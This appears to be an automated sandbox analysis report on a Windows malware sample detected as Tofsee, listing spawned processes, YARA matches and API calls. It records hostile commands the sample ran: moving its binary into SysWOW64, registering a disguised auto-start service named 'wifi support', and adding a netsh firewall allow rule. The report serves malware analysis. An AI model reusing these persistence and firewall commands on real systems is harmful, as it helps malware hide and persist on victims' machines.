                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:09:14:50
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:09:14:50
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                      Imagebase:0x380000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"
                                                                                      Imagebase:0x380000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\sc.exe" start ycgeofkw
                                                                                      Imagebase:0x380000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:09:14:53
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:11'205'632 bytes
                                                                                      MD5 hash:702317DA74C3C1D30ED61EA3A7D7DFCD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:09:14:53
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                      Imagebase:0x1080000
                                                                                      File size:82'432 bytes
                                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:09:14:53
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:15
                                                                                      Start time:09:14:54
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:svchost.exe
                                                                                      Imagebase:0xce0000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Has exited:false

                                                                                      Reset < >
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                          • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                          • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                          • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                        • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                        • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                        • ExitProcess.KERNEL32 ref: 00409C06
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                        • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                        • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                        • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                        • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                        • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                        • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                        • wsprintfA.USER32 ref: 0040A0B6
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                        • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                        • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                        • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                          • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                        • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                        • DeleteFileA.KERNEL32(004133D8), ref: 0040A407
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
                                                                                        • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                        • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                        • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                        • String ID: "$"$"$%X%08X$D$P$PromptOnSecureDesktop$\
                                                                                        • API String ID: 2089075347-2824936573
                                                                                        • Opcode ID: 603121095b7679364f468b5179938349acae34033f0d3c12a89c9af7faf008a0
                                                                                        • Instruction ID: 9e8e6158c267d4507ba39c142606b205eb09e8ef63bc9ae6e883bbf27c052806
                                                                                        • Opcode Fuzzy Hash: 603121095b7679364f468b5179938349acae34033f0d3c12a89c9af7faf008a0
                                                                                        • Instruction Fuzzy Hash: 4A5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                        • wsprintfA.USER32 ref: 004093CE
                                                                                        • wsprintfA.USER32 ref: 0040940C
                                                                                        • wsprintfA.USER32 ref: 0040948D
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: PromptOnSecureDesktop$runas
                                                                                        • API String ID: 3696105349-2220793183
                                                                                        • Opcode ID: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction ID: b6d0878b1d73306239325ce20442e1ed3f1d42e4277a972a89fda7ad6b3a58d4
                                                                                        • Opcode Fuzzy Hash: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction Fuzzy Hash: A7A181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                        • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1251348514-2980165447
                                                                                        • Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction ID: ab228a986819567a034f5778c60117e3a6ddbbfebf067212e33de9fc62893814
                                                                                        • Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction Fuzzy Hash: 6C31F1B2900108BFDB00DFA09D44ADF7F78EF48310F158076E212F7291D674A9618F69
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                        • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$CountFileInformationSystemTickVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1209300637-0
                                                                                        • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                        • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .$GetProcAddress.$l
                                                                                        • API String ID: 0-2784972518
                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                        • Instruction ID: 4c179cc9f1fbbad5c01b9e411db6f09a13f0a630f043a6fe6fc99bf0778dc4f6
                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                        • Instruction Fuzzy Hash: 973128B6900609DFDB10CF99C880AAEBBF5FF48324F19544AD841AB354D771EA85CBA4
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0267908E
                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 026790AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Offset: 02669000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3833638111-0
                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction ID: 17b94bab2789fee953e228ab240145e13e27ef9d635636704f6f942b25b2cfa5
                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction Fuzzy Hash: 16F06D36611714ABD7203AF9A88CF6E76F8EF89725F10062CE642925C0DB70E8458A61
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                          • Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
                                                                                          • Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateSize
                                                                                        • String ID:
                                                                                        • API String ID: 2559512979-0
                                                                                        • Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                        • Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
                                                                                        • Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                        • Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,75920F10,00000000), ref: 00407472
                                                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,75920F10,00000000), ref: 004074F0
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,75920F10,00000000), ref: 00407528
                                                                                        • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,75920F10,00000000), ref: 004076E7
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 00407717
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,75920F10,00000000), ref: 00407745
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 004077EF
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004077E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
